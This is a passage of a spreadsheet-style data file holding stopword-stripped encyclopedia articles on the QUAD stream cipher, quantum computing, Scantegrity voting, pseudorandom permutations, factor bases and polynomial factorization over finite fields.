    <t>cryptography, quad, cipher relatively stream cipher, designed provable security arguments mind. description quad relies iteration randomly chosen multivariate quadratic system s=(q1, ..., m=kn equations unknowns finite field gf(q). keystream generation process simply consists iterating three following steps order produce gf(q) keystream values iteration. compute kn-tuple gf(q) values s(x) (q1(x),..., qkn(x)) current value internal state; output sequence (qn+1(x),..., qkn(x)) (k-1)n gf(q) keystream values update internal state sequence gf(q) first generated values (q1(x),..., qn(x))quad modern stream cipher, i.e. uses initialisation value (iv) produce keystream sequence. setup also defined also rely multivariate quadratic system. security security keystream generation quad provably reducible conjectured intractability problem, namely solving multivariate system quadratic equations. first proof done field gf(2) old-fashioned stream cipher (where initial state). later extended berbain gilbert order take account set-up procedure modern cipher (with setup stage deriving initial state key). security whole cipher pseudo random function related conjectured intractability problem. authors also studied resistance cipher classical attacks. parameters recommended authors recommend version quad 80-bit key, 80-bit internal state bits. outputs keystream bits 320) iteration bits keystream produced. eurocrypt 2006, speed reports presented quad instances 160-bit state output block fields gf(2), gf(16), gf(256). these speed reports part analysis "efficient implementations multivariate quadratic systems" published berbain, billet, gilbert 2006. this analysis (which also covers several multivariate public-key schemes well quad stream cipher) studied part impact changing size field performances without considering security aspect. discussion parameters initial security theorem quad valid field gf(2) only, recommended parameters achieve contradiction proof security. authors quad gave security theorem acknowledged break quad suggested parameters contradict proof-of-security theorems proposed scheme eurocrypt 2006. however seemed authors considered sufficient provide desired security level 280. yang, chen, bernstein chen studied security different parameter sets document "analysis quad" found insecure. their paper discusses theoretical practical aspects attacking quad attacking underlying hard problem. example, paper shows xl-wiedemann break gf(256) instance quad (256, approximately opteron cycles, break underlying hard problem approximately cycles, carried successfully. however, according paper, would take 2110 solve instance quad(2,160,160) version recommended authors quad using xl-wiedemann. study yang highlighted fact security theorems often rely reductions looseness factor, taken account, none parameter sets suggested versions sufficient proof security. instance provably secure would quad(2,320,320), twice wide originally proposed. security theorem also proved gf(q), albeit larger looseness factor; extensions quad efficient implementations proposed (see reference "secure prngs specialized polynomial maps fq"). references "quad: practical stream cipher provable security" (pdf). retrieved 2008-03-18. "efficient implementations multivariate quadratic systems" (pdf). retrieved 2008-03-18. security dependent stream ciphers" (pdf). retrieved 2008-03-18. "analysis quad" (adobe acrobat format). 2007-03-03. retrieved 2008-02-05. "analysis multivariate hash functions" (pdf). "secure prngs specialized polynomial maps $f_q$" (pdf).</t>
  </si>
  <si>
    <t>Quantum computer</t>
  </si>
  <si>
    <t>quantum computing type computation whose operations harness phenomena quantum mechanics, superposition, interference, entanglement. devices perform quantum computations known quantum computers. though current quantum computers small outperform usual (classical) computers practical applications, larger realizations believed capable solving certain computational problems, integer factorization (which underlies encryption), substantially faster classical computers. study quantum computing subfield quantum information science. there several models quantum computation widely used quantum circuits. other models include quantum turing machine, quantum annealing, adiabatic quantum computation. most models based quantum bit, "qubit", somewhat analogous classical computation. qubit quantum state, superposition states. when measured, however, always probability either outcome depends qubit's quantum state immediately prior measurement. efforts towards building physical quantum computer focus technologies transmons, traps topological quantum computers, create high-quality qubits.: 2–13 these qubits designed differently, depending full quantum computer's computing model, whether quantum logic gates, quantum annealing, adiabatic quantum computation employed. there currently number significant obstacles constructing useful quantum computers. particularly difficult maintain qubits' quantum states, suffer quantum decoherence state fidelity. quantum computers therefore require error correction.any computational problem solved classical computer also solved quantum computer.: conversely, problem solved quantum computer also solved classical computer, least principle given enough time. words, quantum computers obey church–turing thesis. this means quantum computers provide additional advantages classical computers terms computability, quantum algorithms certain problems significantly lower time complexities corresponding known classical algorithms. notably, quantum computers believed able quickly solve certain problems classical computer could solve feasible amount time—a feat known "quantum supremacy." study computational complexity problems respect quantum computers known quantum complexity theory. history quantum computing began 1980 physicist paul benioff proposed quantum mechanical model turing machine. richard feynman yuri manin later suggested quantum computer potential simulate things classical computer could feasibly 1986 feynman introduced early version quantum circuit notation. 1994, peter shor developed quantum algorithm finding prime factors integer potential decrypt rsa-encrypted communications. 1998 isaac chuang, neil gershenfeld mark kubinec created first two-qubit quantum computer could perform computations. despite ongoing experimental progress since late 1990s, researchers believe "fault-tolerant quantum computing [is] still rather distant dream." recent years, investment quantum computing research increased public private sectors. october 2019, google partnership u.s. national aeronautics space administration (nasa), claimed performed quantum computation infeasible classical computer, whether claim still valid topic active research.a december 2021 mckinsey company analysis states "..investment dollars pouring quantum-computing start-ups proliferating". they note "while quantum computing promises help businesses solve problems beyond reach speed conventional high-performance computers, cases largely experimental hypothetical early stage." quantum circuit definition prevailing model quantum computation describes computation terms network quantum logic gates. this model complex linear-algebraic generalization boolean circuits.a memory consisting {\textstyle bits information {\textstyle 2^{n}} possible states. vector representing memory states thus {\textstyle 2^{n}} entries (one state). this vector viewed probability vector represents fact memory found particular state. bits classical computers capable superposition, entry must value (i.e. 100% probability state) entries would zero. quantum mechanics, probability vectors generalized density operators. quantum state vector formalism usually introduced first conceptually simpler, used instead density matrix formalism pure states, whole quantum system known. begin considering simple memory consisting quantum bit. when measured, memory found states: zero state state. represent state memory using dirac notation quantum memory found quantum superposition {\textstyle |\psi \rangle classical states {\textstyle |0\rangle {\textstyle |1\rangle coefficients {\textstyle \alpha {\textstyle \beta complex numbers. state {\textstyle |\psi \rangle probability vector connected probability vector measurement operation. quantum memory measured determine whether state {\textstyle |0\rangle {\textstyle |1\rangle (this known computational basis measurement), zero state would observed probability {\textstyle |\alpha |^{2}} state probability {\textstyle |\beta |^{2}} numbers {\textstyle \alpha {\textstyle \beta called probability amplitudes. state one-qubit quantum memory manipulated applying quantum logic gates, analogous classical memory manipulated classical logic gates. important gate classical quantum computation gate, represented matrix mathematically, application logic gate quantum state vector modelled matrix multiplication. thus {\textstyle x|0\rangle =|1\rangle {\textstyle x|1\rangle =|0\rangle mathematics single qubit gates extended operate multi-qubit quantum memories important ways. simply select qubit apply gate target qubit whilst leaving remainder memory unaffected. another apply gate target another part memory desired state. these choices illustrated using another example. possible states two-qubit quantum memory cnot gate represented using following matrix: mathematical consequence definition, cnot {\textstyle \operatorname {cnot} |00\rangle =|00\rangle cnot {\textstyle \operatorname {cnot} |01\rangle =|01\rangle cnot {\textstyle \operatorname {cnot} |10\rangle =|11\rangle cnot {\textstyle \operatorname {cnot} |11\rangle =|10\rangle words, cnot applies gate {\textstyle before) second qubit first qubit state {\textstyle |1\rangle first qubit {\textstyle |0\rangle nothing done either qubit. summary, quantum computation described network quantum logic gates measurements. however, measurement deferred quantum computation, though deferment come computational cost, quantum circuits depict network consisting quantum logic gates measurements. quantum computation (which formalism, unitary matrix size {\displaystyle 2^{n}\times 2^{n}} {\displaystyle qubits) represented network quantum logic gates fairly small family gates. choice gate family enables construction known universal gate set, since computer circuits universal quantum computer. common includes single-qubit gates well cnot gate above. this means quantum computation performed executing sequence single-qubit gates together cnot gates. though gate infinite, replaced finite gate appealing solovay-kitaev theorem. quantum algorithms progress finding quantum algorithms typically focuses quantum circuit model, though exceptions like quantum adiabatic algorithm exist. quantum algorithms roughly categorized type speedup achieved corresponding classical algorithms.quantum algorithms offer polynomial speedup best known classical algorithm include shor's algorithm factoring related quantum algorithms computing discrete logarithms, solving pell's equation, generally solving hidden subgroup problem abelian finite groups. these algorithms depend primitive quantum fourier transform. mathematical proof found shows equally fast classical algorithm cannot discovered, although considered unlikely. certain oracle problems like simon's problem bernstein–vazirani problem give provable speedups, though quantum query model, restricted model lower bounds much easier prove necessarily translate speedups practical problems. other problems, including simulation quantum physical processes chemistry solid-state physics, approximation certain jones polynomials, quantum algorithm linear systems equations quantum algorithms appearing give super-polynomial speedups bqp-complete. because problems bqp-complete, equally fast classical algorithm would imply quantum algorithm gives super-polynomial speedup, believed unlikely.some quantum algorithms, like grover's algorithm amplitude amplification, give polynomial speedups corresponding classical algorithms. though algorithms give comparably modest quadratic speedup, widely applicable thus give speedups wide range problems. many examples provable quantum speedups query problems related grover's algorithm, including brassard, høyer, tapp's algorithm finding collisions two-to-one functions, uses grover's algorithm, farhi, goldstone, gutmann's algorithm evaluating nand trees, variant search problem. potential applications cryptography notable application quantum computation attacks cryptographic systems currently use. integer factorization, underpins security public cryptographic systems, believed computationally infeasible ordinary computer large integers product prime numbers (e.g., products 300-digit primes). comparison, quantum computer could efficiently solve problem using shor's algorithm find factors. this ability would allow quantum computer break many cryptographic systems today, sense would polynomial time number digits integer) algorithm solving problem. particular, popular public ciphers based difficulty factoring integers discrete logarithm problem, solved shor's algorithm. particular, rsa, diffie–hellman, elliptic curve diffie–hellman algorithms could broken. these used protect secure pages, encrypted email, many types data. breaking would significant ramifications electronic privacy security. identifying cryptographic systems secure quantum algorithms actively researched topic field post-quantum cryptography. some public-key algorithms based problems integer factorization discrete logarithm problems shor's algorithm applies, like mceliece cryptosystem based problem coding theory. lattice-based cryptosystems also known broken quantum computers, finding polynomial time algorithm solving dihedral hidden subgroup problem, would break many lattice based cryptosystems, well-studied open problem. proven applying grover's algorithm break symmetric (secret key) algorithm brute force requires time equal roughly 2n/2 invocations underlying cryptographic algorithm, compared roughly classical case, meaning symmetric lengths effectively halved: aes-256 would security attack using grover's algorithm aes-128 classical brute-force search (see size). quantum cryptography could potentially fulfill functions public cryptography. quantum-based cryptographic systems could, therefore, secure traditional systems quantum hacking. search problems well-known example problem admitting polynomial quantum speedup unstructured search, finding marked item list {\displaystyle items database. this solved grover's algorithm using {\displaystyle o({\sqrt {n}})} queries database, quadratically fewer {\displaystyle \omega (n)} queries required classical algorithms. case, advantage provable also optimal: shown grover's algorithm gives maximal possible probability finding desired element number oracle lookups. problems efficiently addressed grover's algorithm following properties: there searchable structure collection possible answers, number possible answers check number inputs algorithm, there exists boolean function evaluates input determines whether correct answerfor problems properties, running time grover's algorithm quantum computer scales square root number inputs elements database), opposed linear scaling classical algorithms. general class problems grover's algorithm applied boolean satisfiability problem, database algorithm iterates possible answers. example possible application password cracker attempts guess password. breaking symmetric ciphers algorithm interest government agencies. simulation quantum systems since chemistry nanotechnology rely understanding quantum systems, systems impossible simulate efficient manner classically, many believe quantum simulation important applications quantum computing. quantum simulation could also used simulate behavior atoms particles unusual conditions reactions inside collider. quantum simulations might used predict future paths particles protons superposition double-slit experiment. about annual global energy output used nitrogen fixation produce ammonia haber process agricultural fertilizer industry naturally occurring organisms also produce ammonia. quantum simulations might used understand process increasing production. quantum annealing adiabatic optimization quantum annealing adiabatic quantum computation relies adiabatic theorem undertake calculations. system placed ground state simple hamiltonian, slowly evolved complicated hamiltonian whose ground state represents solution problem question. adiabatic theorem states evolution slow enough system stay ground state times process. machine learning since quantum computers produce outputs classical computers cannot produce efficiently, since quantum computation fundamentally linear algebraic, express hope developing quantum algorithms speed machine learning tasks. example, quantum algorithm linear systems equations, "hhl algorithm", named discoverers harrow, hassidim, lloyd, believed provide speedup classical counterparts. some research groups recently explored quantum annealing hardware training boltzmann machines deep neural networks. computational biology field computational biology, quantum computing played role solving many biological problems. well-known examples would computational genomics computing drastically reduced time sequence human genome. given computational biology using generic data modeling storage, applications computational biology expected arise well. microrna function investigated using quantum computing algorithm. computer-aided drug design generative chemistry deep generative chemistry models emerge powerful tools expedite drug discovery. however, immense size complexity structural space possible drug-like molecules pose significant obstacles, could overcome future quantum computers. quantum computers naturally good solving complex quantum many-body problems thus instrumental applications involving quantum chemistry. therefore, expect quantum-enhanced generative models including quantum gans eventually developed ultimate generative chemistry algorithms. hybrid architectures combining quantum computers deep classical networks, quantum variational autoencoders, already trained commercially available annealers used generate novel drug-like molecular structures. developing physical quantum computers challenges there number technical challenges building large-scale quantum computer. physicist david divincenzo listed requirements practical quantum computer: physically scalable increase number qubits qubits initialized arbitrary values quantum gates faster decoherence time universal gate qubits read easilysourcing parts quantum computers also difficult. many quantum computers, like constructed google ibm, need helium-3, nuclear research byproduct, special superconducting cables made japanese company coax co.the control multi-qubit systems requires generation coordination large number electrical signals tight deterministic timing resolution. this development quantum controllers enable interfacing qubits. scaling systems support growing number qubits additional challenge. quantum decoherence greatest challenges involved constructing quantum computers controlling removing quantum decoherence. this usually means isolating system environment interactions external world cause system decohere. however, sources decoherence also exist. examples include quantum gates, lattice vibrations background thermonuclear spin physical system used implement qubits. decoherence irreversible, effectively non-unitary, usually something highly controlled, avoided. decoherence times candidate systems particular, transverse relaxation time (for technology, also called dephasing time), typically range nanoseconds seconds temperature. currently, quantum computers require qubits cooled millikelvin (usually using dilution refrigerator) order prevent significant decoherence. 2020 study argues ionizing radiation cosmic rays nevertheless cause certain systems decohere within milliseconds.as result, time-consuming tasks render quantum algorithms inoperable, maintaining state qubits long enough duration eventually corrupt superpositions.these issues difficult optical approaches timescales orders magnitude shorter often-cited approach overcoming optical pulse shaping. error rates typically proportional ratio operating time decoherence time, hence operation must completed much quickly decoherence time. described quantum threshold theorem, error rate small enough, thought possible quantum error correction suppress errors decoherence. this allows total calculation time longer decoherence time error correction scheme correct errors faster decoherence introduces them. often cited figure required error rate gate fault-tolerant computation 10−3, assuming noise depolarizing. meeting scalability condition possible wide range systems. however, error correction brings cost greatly increased number required qubits. number required factor integers using shor's algorithm still polynomial, thought number digits number factored; error correction algorithms would inflate figure additional factor 1000-bit number, implies need bits without error correction. with error correction, figure would rise bits. computation time steps mhz, seconds. different approach stability-decoherence problem create topological quantum computer anyons, quasi-particles used threads relying braid theory form stable logic gates. quantum supremacy quantum supremacy term coined john preskill referring engineering feat demonstrating programmable quantum device solve problem beyond capabilities state-of-the-art classical computers. problem need useful, view quantum supremacy test potential future benchmark.in october 2019, google quantum, help nasa, became first claim achieved quantum supremacy performing calculations sycamore quantum computer 3,000,000 times faster could done summit, generally considered world's fastest computer. this claim subsequently challenged: stated summit perform samples much faster claimed, researchers since developed better algorithms sampling problem used claim quantum supremacy, giving substantial reductions sycamore classical supercomputersand even beating it.in december 2020, group ustc implemented type boson sampling photons photonic quantum computer jiuzhang demonstrate quantum supremacy. authors claim classical contemporary supercomputer would require computational time million years generate number samples quantum processor generate seconds. november 2021 quantum computing summit presented 127-qubit microprocessor named eagle. skepticism some researchers expressed skepticism scalable quantum computers could ever built, typically issue maintaining coherence large scales. bill unruh doubted practicality quantum computers paper published back 1994. paul davies argued 400-qubit computer would even come conflict cosmological information bound implied holographic principle. skeptics like kalai doubt quantum supremacy ever achieved. physicist mikhail dyakonov expressed skepticism quantum computing follows: number continuous parameters describing state useful quantum computer given moment must be... 10300... could ever learn control 10300 continuously variable parameters defining quantum state system? answer simple. never." candidates physical realizations physically implementing quantum computer, many different candidates pursued, among (distinguished physical system used realize qubits): superconducting quantum computing (qubit implemented state small superconducting circuits [josephson junctions]) trapped quantum computer (qubit implemented internal state trapped ions) neutral atoms optical lattices (qubit implemented internal states neutral atoms trapped optical lattice) quantum computer, spin-based (e.g. loss-divincenzo quantum computer) (qubit given spin states trapped electrons) quantum computer, spatial-based (qubit given electron position double quantum dot) quantum computing using engineered quantum wells, could principle enable construction quantum computers operate room temperature coupled quantum wire (qubit implemented pair quantum wires coupled quantum point contact) nuclear magnetic resonance quantum computer (nmrqc) implemented nuclear magnetic resonance molecules solution, qubits provided nuclear spins within dissolved molecule probed radio waves solid-state kane quantum computers (qubit realized nuclear spin state phosphorus donors silicon) vibrational quantum computer (qubits realized vibrational superpositions cold molecules) electrons-on-helium quantum computers (qubit electron spin) cavity quantum electrodynamics (cqed) (qubit provided internal state trapped atoms coupled high-finesse cavities) molecular magnet (qubit given spin states) fullerene-based quantum computer (qubit based electronic spin atoms molecules encased fullerenes) nonlinear optical quantum computer (qubits realized processing states different modes light linear nonlinear elements) linear optical quantum computer (qubits realized processing states different modes light linear elements e.g. mirrors, beam splitters phase shifters) diamond-based quantum computer (qubit realized electronic nuclear spin nitrogen-vacancy centers diamond) bose-einstein condensate-based quantum computer transistor-based quantum computer string quantum computers entrainment positive holes using electrostatic trap rare-earth-metal-ion-doped inorganic crystal based quantum computers (qubit realized internal electronic state dopants optical fibers) metallic-like carbon nanospheres-based quantum computersthe large number candidates demonstrates quantum computing, despite rapid progress, still infancy. models computation quantum computing there number models computation quantum computing, distinguished basic elements computation decomposed. practical implementations, four relevant models computation are: quantum gate array computation decomposed sequence few-qubit quantum gates. one-way quantum computer computation decomposed sequence bell state measurements single-qubit quantum gates applied highly entangled initial state cluster state), using technique called quantum gate teleportation. adiabatic quantum computer, based quantum annealing computation decomposed slow continuous transformation initial hamiltonian final hamiltonian, whose ground states contain solution. topological quantum computer computation decomposed braiding anyons lattice.the quantum turing machine theoretically important physical implementation model feasible. models computation—quantum circuits, one-way quantum computation, adiabatic quantum computation, topological quantum computation—have shown equivalent quantum turing machine; given perfect implementation quantum computer, simulate others polynomial overhead. this equivalence need hold practical quantum computers, since overhead simulation large practical. relation computability complexity theory computability theory computational problem solvable classical computer also solvable quantum computer. intuitively, believed physical phenomena, including operation classical computers, described using quantum mechanics, underlies operation quantum computers. conversely, problem solvable quantum computer also solvable classical computer. possible simulate quantum classical computers manually paper pen, given enough time. more formally, quantum computer simulated turing machine. words, quantum computers provide additional power classical computers terms computability. this means quantum computers cannot solve undecidable problems like halting problem existence quantum computers disprove church–turing thesis. quantum complexity theory while quantum computers cannot solve problems classical computers cannot already solve, suspected solve certain problems faster classical computers. instance, known quantum computers efficiently factor integers, believed case classical computers. class problems efficiently solved quantum computer bounded error called bqp, "bounded error, quantum, polynomial time". more formally, class problems solved polynomial-time quantum turing machine error probability 1/3. class probabilistic problems, quantum counterpart ("bounded error, probabilistic, polynomial time"), class problems solved polynomial-time probabilistic turing machines bounded error. known {\displaystyle {\mathsf {bpp\subseteq bqp}}} widely suspected {\displaystyle {\mathsf {bqp\subsetneq bpp}}} intuitively would mean quantum computers powerful classical computers terms time complexity. exact relationship pspace known. however, known {\displaystyle {\mathsf {p\subseteq bqp\subseteq pspace}}} problems efficiently solved deterministic classical computer also efficiently solved quantum computer, problems efficiently solved quantum computer also solved deterministic classical computer polynomial space resources. suspected strict superset meaning problems efficiently solvable quantum computers efficiently solvable deterministic classical computers. instance, integer factorization discrete logarithm problem known suspected outside relationship little known beyond fact problems believed also (integer factorization discrete logarithm problem example). suspected {\displaystyle {\mathsf {np\nsubseteq bqp}}} believed efficiently checkable problems efficiently solvable quantum computer. direct consequence belief, also suspected disjoint class np-complete problems np-complete problem bqp, would follow np-hardness problems bqp).the relationship basic classical complexity classes summarized follows: {\displaystyle {\mathsf {p\subseteq bpp\subseteq bqp\subseteq pp\subseteq pspace}}} also known contained complexity class {\displaystyle \color {blue}{\mathsf {\#p}}} precisely associated class decision problems {\displaystyle {\mathsf {p^{\#p}}}} subclass pspace. speculated advances physics could lead even faster computers. instance, shown non-local hidden variable quantum computer based bohmian mechanics could implement search n-item database {\displaystyle o({\sqrt[{3}]{n}})} steps, slight speedup grover's algorithm, runs {\displaystyle o({\sqrt {n}})} steps. note, however, neither search method would allow quantum computers solve np-complete problems polynomial time. theories quantum gravity, m-theory loop quantum gravity, allow even faster computers built. however, defining computation theories open problem problem time; within physical theories currently obvious describe means observer submit input computer point time receive output later point time. also notes references further reading external links stanford encyclopedia philosophy: "quantum computing" amit hagar michael cuffaro. "quantum computation, theory of", encyclopedia mathematics, press, 2001 [1994] quantum computing curious andy matuschak michael nielsenlecturesquantum computing determined video lectures michael nielsen video lectures david deutsch lectures institut henri poincaré (slides videos) online lecture introduction quantum computing, edward gerjuoy (2008) lomonaco, sam. four lectures quantum computing given oxford university july 2006</t>
  </si>
  <si>
    <t>Scantegrity</t>
  </si>
  <si>
    <t>scantegrity security enhancement optical scan voting systems, providing systems end-to-end (e2e) verifiability election results. uses confirmation codes allow voter prove ballot included unmodified final tally. codes privacy-preserving offer proof candidate voter voted for. receipts safely shown without compromising ballot secrecy.scantegrity prints confirmation codes invisible improve usability dispute resolution. system relies cryptographic techniques, ability validate election outcome software independent well independent faults physical chain-of-custody paper ballots. system developed team researchers including cryptographers david chaum rivest. advantages optical scan voting systems produce electronic tally, maintaining original paper ballots rescanned manually hand-counted provide ostensibly corroborative tally. however, correctness tallies requires voter either trust software error-free hacked, physical chain-of-custody ballots broken point. other voting systems punchscan threeballot, address issues require existing polling place equipment procedures greatly altered replaced. contrast, scantegrity add-on meant used conjunction existing optical scan equipment, thereby requiring fewer hardware software procedural modifications.for voters, ballot marking procedure essentially identical conventional optical scan paper-ballots. similarly, underlying system still produces electronic tally well human readable paper trail manual recounts still conducted. method scantegrity voting procedure similar traditional optical scan voting system, except voting response location contains random confirmation code printed invisible ink. voter marks location using specially provided "decoder" pen, activates invisible causing darken, revealing confirmation code.voters wishing verify vote unmodified write confirmation codes race detachable chit contains ballot's serial number. otherwise, voter simply ignore code continue mark cast ballot normal. confirmation codes randomly assigned ballots, allowing voters freely share codes keeping votes secret. codes also pre-committed committee mutually-distrustful entities (such representatives political party) confirmation codes cannot changed misprinted without detection. voters request additional ballots audit—they ensure ballots properly printed revealing codes comparing codes committed checking after election finished, election authority publicly posts list confirmation codes positions marked ballot received. voters wrote codes verify codes correct ballot number codes added removed. posted record incorrect, voter file dispute. spurious disputes excluded consideration comparing claimed codes possible codes given contest ballot—the probability randomly guessing code actually appeared ballot low. verification after election, trustees generate independent tally voter-verifiable list ballots confirmation codes. since link confirmation code candidate voted must remain secret, tally generated using anonymity-preserving backend. many backends proposed tallying votes, including ones used punchscan prêt voter. steps tally recalculated anyone ensure correctness. reason, system accurately described mathematical voting electronic voting. security system require software operate correctly, mathematical operations independently corroborated interested parties. public elections city takoma park, maryland used scantegrity november, 2009 election. scantegrity used takoma park november, 2011 election. notes further reading external links scantegrity.org scantegrity video presentation adida's takoma park election blog</t>
  </si>
  <si>
    <t>Pseudorandom permutation</t>
  </si>
  <si>
    <t>cryptography, pseudorandom permutation (prp) function cannot distinguished random permutation (that permutation selected random uniform probability, family permutations function's domain) practical effort. definition mapping {\displaystyle \left\{0,1\right\}^{n}\times \left\{0,1\right\}^{s}\rightarrow \left\{0,1\right\}^{n}} {\displaystyle k\in \left\{0,1\right\}^{s}} {\displaystyle f_{k}} bijection {\displaystyle \left\{0,1\right\}^{n}} {\displaystyle \left\{0,1\right\}^{n}} {\displaystyle f_{k}(x)=f(x,k)} {\displaystyle k\in \left\{0,1\right\}^{s}} "efficient" algorithm evaluate {\displaystyle f_{k}(x)} {\displaystyle x\in \left\{0,1\right\}^{n}} probabilistic polynomial-time distinguishers {\displaystyle {\displaystyle \left|pr\left(d^{f_{k}}(1^{n})=1\right)-pr\left(d^{f_{n}}(1^{n})=1\right)\right|&lt;\varepsilon (s)} {\displaystyle k\in \left\{0,1\right\}^{s}} chosen uniformly random {\displaystyle f_{n}} chosen uniformly random permutations n-bit strings.a pseudorandom permutation family collection pseudorandom permutations, specific permutation chosen using key. model block ciphers idealized abstraction (keyed) block cipher truly random permutation mappings plaintext ciphertext. distinguishing algorithm exists achieves significant advantage less effort specified block cipher's security parameter (this usually means effort required brute force search cipher's space), cipher considered broken least certificational sense, even break immediately lead practical security failure.modern ciphers expected super pseudorandomness. that cipher indistinguishable randomly chosen permutation message space, even adversary black-box access forward inverse directions cipher. connections pseudorandom function michael luby charles rackoff showed "strong" pseudorandom permutation built pseudorandom function using luby–rackoff construction built using feistel cipher. related concepts unpredictable permutation unpredictable permutation (up) permutation whose values cannot predicted fast randomized algorithm. unpredictable permutations used cryptographic primitive, building block cryptographic systems complex properties. adversary unpredictable permutation defined algorithm given access oracle forward inverse permutation operations. adversary given challenge input asked predict value allowed make series queries oracle help make prediction, allowed query value itself.a randomized algorithm generating permutations generates unpredictable permutation outputs permutations items (described length-n binary strings) cannot predicted accuracy significantly better random adversary makes polynomial number queries oracle prior challenge round, whose running time polynomial whose error probability less instances. that cannot predicted complexity class relativized oracle permutation. properties unpredictable permutations shown function secure message authentication code (mac) satisfies unpredictability requirement. also shown cannot build efficient variable input length block cipher modelled bits. shown output n/ω(log round feistel construction unpredictable round functions leak intermediate round values. even realistic unpredictable functions (uf), partial information intermediate round values leaked output. later shown super-logarithmic number rounds feistel construction used, resulting construction secure even adversary gets intermediate round values along permutation output.there also theorem proven regard states exists efficient adversary non-negligible advantage unpredictability game construction ψu,k makes polynomial number queries challenger, also exists adversary non-negligible advantage unpredictability game sampled family from this, shown maximum advantage adversary (εf. (qk)6). here denotes maximum advantage adversary running time (qk)5) sampled running time adversary number queries made it.in addition, signature scheme satisfies property unpredictability necessarily pseudo-randomness essentially verifiable unpredictable function (vuf). verifiable unpredictable function defined analogously verifiable pseudorandom function (vrf) pseudo-randomness substituted weaker unpredictability. verifiable unpredictable permutations permutation analogs vufs unpredictable analogs vrps. also actually built building feistel construction applied vrf. viewed useful since vufs appear much easier construct vrfs. applications desk x={0,1}64, k={0,1}56aes-128k k=x={0,1}128 also block cipher (pseudorandom permutation families operating fixed-size blocks bits) format-preserving encryption (pseudorandom permutation families operating arbitrary finite sets) references</t>
  </si>
  <si>
    <t>Factor base</t>
  </si>
  <si>
    <t>computational number theory, factor base small prime numbers commonly used mathematical tool algorithms involving extensive sieving potential factors given integer. usage factoring algorithms factor base relatively small distinct prime numbers sometimes together want factorize integer generate, way, large number integer pairs {\displaystyle x\neq {\displaystyle x^{2}\equiv y^{2}{\pmod {n}}} {\displaystyle x^{2}{\pmod {n}}{\text{ }}y^{2}{\pmod {n}}} completely factorized chosen factor base—that prime factors practice, several integers found {\displaystyle x^{2}{\pmod {n}}} prime factors pre-chosen factor base. represent {\displaystyle x^{2}{\pmod {n}}} expression vector matrix integer entries exponents factors factor base. linear combinations rows corresponds multiplication expressions. linear dependence relation among rows leads desired congruence {\displaystyle x^{2}\equiv y^{2}{\pmod {n}}} this essentially reformulates problem system linear equations, solved using numerous methods gaussian elimination; practice advanced methods like block lanczos algorithm used, take advantage certain properties system. this congruence generate trivial {\displaystyle \textstyle n=1\cdot case find another suitable congruence. repeated attempts factor fail using different factor base. algorithms factor bases used example, dixon's factorization, quadratic sieve, number field sieve. difference algorithms essentially methods used generate candidates. factor bases also used index calculus algorithm computing discrete logarithms. references</t>
  </si>
  <si>
    <t>Factorization of polynomials over finite fields</t>
  </si>
  <si>
    <t>mathematics computer algebra factorization polynomial consists decomposing product irreducible factors. this decomposition theoretically possible unique polynomials coefficients field, rather strong restrictions field coefficients needed allow computation factorization means algorithm. practice, algorithms designed polynomials coefficients finite field, field rationals finitely generated field extension them. factorization algorithms, including case multivariate polynomials rational numbers, reduce problem case; polynomial factorization. also used various applications finite fields, coding theory (cyclic redundancy codes codes), cryptography (public cryptography means elliptic curves), computational number theory. reduction factorization multivariate polynomials univariate polynomials specificity case coefficients finite field, polynomials variable considered article. background finite field theory finite fields, whose origins traced back works gauss galois, played part various branches mathematics. applicability concept topics mathematics sciences like computer science resurgence interest finite fields partly important applications coding theory cryptography. applications finite fields introduce developments cryptography, computer algebra coding theory. finite field galois field field finite order (number elements). order finite field always prime power prime. prime power exists exactly finite field elements, isomorphism. this field denoted gf(q) prime, gf(p) prime field order field residue classes modulo elements denoted ..., p−1. thus gf(p) means (mod irreducible polynomials finite field. general fields, non-constant polynomial f[x] said irreducible product polynomials positive degree. polynomial positive degree irreducible called reducible irreducible polynomials allow construct finite fields non-prime order. fact, prime power finite field elements, unique isomorphism. polynomial degree greater one, irreducible defines field extension degree isomorphic field elements: elements extension polynomials degree lower addition, subtraction multiplication element polynomials; product elements remainder division product polynomials; inverse element computed extended algorithm (see arithmetic algebraic extensions). follows that, compute finite field prime order, needs generate irreducible polynomial. this, common method take polynomial random test irreducibility. sake efficiency multiplication field, usual search polynomials shape b.irreducible polynomials finite fields also useful pseudorandom number generators using feedback shift registers discrete logarithm f2n. number irreducible monic polynomials degree number aperiodic necklaces, given moreau's necklace-counting function mq(n). closely related necklace function nq(n) counts monic polynomials degree primary power irreducible); alternatively irreducible polynomials degrees divide example polynomial irreducible finite field. field extension (x+1)4. every finite field, least square, product non-squares square haveif {\displaystyle -1=a^{2},} {\displaystyle p=(x^{2}+a)(x^{2}-a).} {\displaystyle 2=b^{2},} {\displaystyle p=(x^{2}+bx+1)(x^{2}-bx+1).} {\displaystyle -2=c^{2},} {\displaystyle p=(x^{2}+cx-1)(x^{2}-cx-1).} complexity polynomial factoring algorithms basic polynomial operations products, divisions, gcd, powers polynomial modulo another, etc. multiplication polynomials degree done o(n2) operations using "classical" arithmetic, o(nlog(n) log(log(n)) operations using "fast" arithmetic. euclidean division (division remainder) performed within time bounds. cost polynomial greatest common divisor polynomials degree taken o(n2) operations using classical methods, o(nlog2(n) log(log(n)) operations using fast methods. polynomials degree exponentiation done o(log(q)) polynomial products, using exponentiation squaring method, o(n2log(q)) operations using classical methods, o(nlog(q)log(n) log(log(n))) operations using fast methods. algorithms follow, complexities expressed terms number arithmetic operations using classical algorithms arithmetic polynomials. factoring algorithms many algorithms factoring polynomials finite fields include following three stages: square-free factorization distinct-degree factorization equal-degree factorizationan important exception berlekamp's algorithm, combines stages berlekamp's algorithm berlekamp's algorithm historically important first factorization algorithm, works well practice. however, contains loop elements ground field, implies practicable small finite fields. fixed ground field, time complexity polynomial, but, general ground fields, complexity exponential size ground field. square-free factorization algorithm determines square-free factorization polynomials whose coefficients come finite field order prime. this algorithm firstly determines derivative computes polynomial derivative. divided original polynomial, provided derivative zero case exists non-constant polynomials defined finite fields). this algorithm uses fact that, derivative polynomial zero, polynomial coefficients belong power polynomial obtained substituting x1/p. coefficients belong p-th root polynomial zero derivative obtained substitution completed applying inverse frobenius automorphism coefficients.this algorithm works also field characteristic zero, difference never enters blocks instructions roots computed. however, case, yun's algorithm much efficient computes greatest common divisors polynomials lower degrees. consequence that, factoring polynomial integers, algorithm follows used: first computes square-free factorization integers, factor resulting polynomials, chooses remain square-free modulo algorithm: (square-free factorization) input: monic polynomial fq[x] q=pm output: square-free factorization make product (without multiplicity) factors multiplicity divisible gcd(f, step identify factors gcd(w, r·faci c/y; product (with multiplicity) remaining factors step identify 